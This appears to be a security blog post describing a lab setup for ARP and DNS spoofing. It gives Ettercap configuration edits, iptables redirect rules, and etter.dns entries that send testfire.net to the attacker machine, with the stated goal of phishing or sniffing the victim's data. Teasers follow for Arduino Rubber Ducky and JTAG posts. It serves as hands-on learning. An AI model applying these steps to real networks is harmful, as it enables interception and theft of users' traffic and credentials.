DNS Spoofing

-

Setup

Gateway => 172.16.84.2
KALI        => 172.16.84.140 [Victim]
PARROT  => 172.16.84.143 [Attacker]

Attacks

  1. ARP Spoofing  [Using Scapy]
  2. DNS Spoofing  [Using Ettercap DNS_Spoof Plugin]

Attack Flow

  1. Attacker perform ARP spoofing [to redirect all the traffic from victim system to attacker machine]
  2. Attacker perform DNS Spoofing [to steal the data by phishing/sniffing]

Scapy ARP Spoof Packets

spkali   => Poison the kali cache table
spgate => Posion the gateway

Refer ARP Spoofing by Scapy

https://just2secure.blogspot.ae/2017/02/arp-poison.html

Ettercap DNS Spoof Configuration

root:~$nano /etc/ettercap/etter.conf
Change 1 (Change the value to Zero)
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

Change 2 (uncomment the 2 lines)
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

root:~$nano /etc/ettercap/etter.dns
Add the below
*.testfire.net    A   172.16.84.143
testfire.net       A   172.16.84.143

Video




Comments

Post a Comment

Popular posts from this blog

JTAG PIN Identification

-
Image
My Setup Parrot Linux Arduino UNO Broadlink RM Mini  Software Arduino IDE JTAGEnum ( https://github.com/cyphunk/JTAGenum ) JTAG PINS to be Identified TCK   - Test Clock TMS  - Test Mode  TDI   - Test Data IN TDO  - Test Data Out GND  - Ground Hardware Connection Set up Connect Laptop and Arduino (USB cable) Arduino Digital PIN (any 5 pins) to RM Mini (5 pins) [Except 1 - VCC and 1 - GND] Note: If you are using JTAGENUM, the JTAGenum sketch uses the DIGITAL PIN from 2 to 11. Refer the line number 72(ino file) Software Connection Set up Download the INO sketch from the github Open the Arduino IDE and Load the downloaded JTAGEnum sketch Choose the correct Serial Port and Board Compile and Upload the sketch Open the Serial Monitor Set the correct baud rate Enter the command to scan ("s") Arduino PIN Layout Digital PIN 2(Black) Digital PIN 3(White) Digital PIN 4(Grey)
Read more
-
Image
Rubber Ducky - Arduino UNO Configuration for Arduino UNO Board: Download and install the Latest version of Arduino ( Recommended : Linux/Mac) Download Boot-loader Sketch(INO) from reference URL Open the INO file in the Arduino IDE Connect a Plain(no other wire connection) Arduino UNO to Laptop via USB cable In Arduino IDE, Select Tools->Board->Arduino/Genuino UNO In Arduino IDE, Select Tools->Port->ttyACM0 [Yours could be different. Use dmesg command to identify] Verify and Upload the Code Wait for the message “Upload Done” and Disconnect the USB cable  Make the cable connection as per the below screenshot attached Connect the USB cable again back to laptop and the boot loader will install by itself Wait for 1 to 2 min till the boot-loader get installed Disconnect USB cable from the laptop and disconnect all the jump wire and make the board plain Configuration for Arduino IDE: Connect the Board to laptop via USB cable Navigate File->Pref
Read more

CWE vs CVE

-
CWE: The Common Weakness Enumeration (CWE) is a formal list of software weakness types created to Serve as a common language for describing software security weaknesses in architecture, design, or code.  Reference: http://cwe.mitre.org/about/index.html   CVE: CVE is a list of information security vulnerabilities and exposures that aims to provide common names for publicly known problems. Reference: http://cve.mitre.org/about/terminology.html http://cve.mitre.org/about/index.html Difference (CWE vs CVE): Software vulnerability is a collection of one or more weaknesses that contain the possible way for an attacker to perform unintended behavior. So a weakness is a patterns or behaviors, a group of weakness or a single weakness may help to perform unintended behavior. In other word, When the weakness can be used by an attacker against the software then that's a vulnerability. For example , If an address parameter in register page is not properly validated
Read more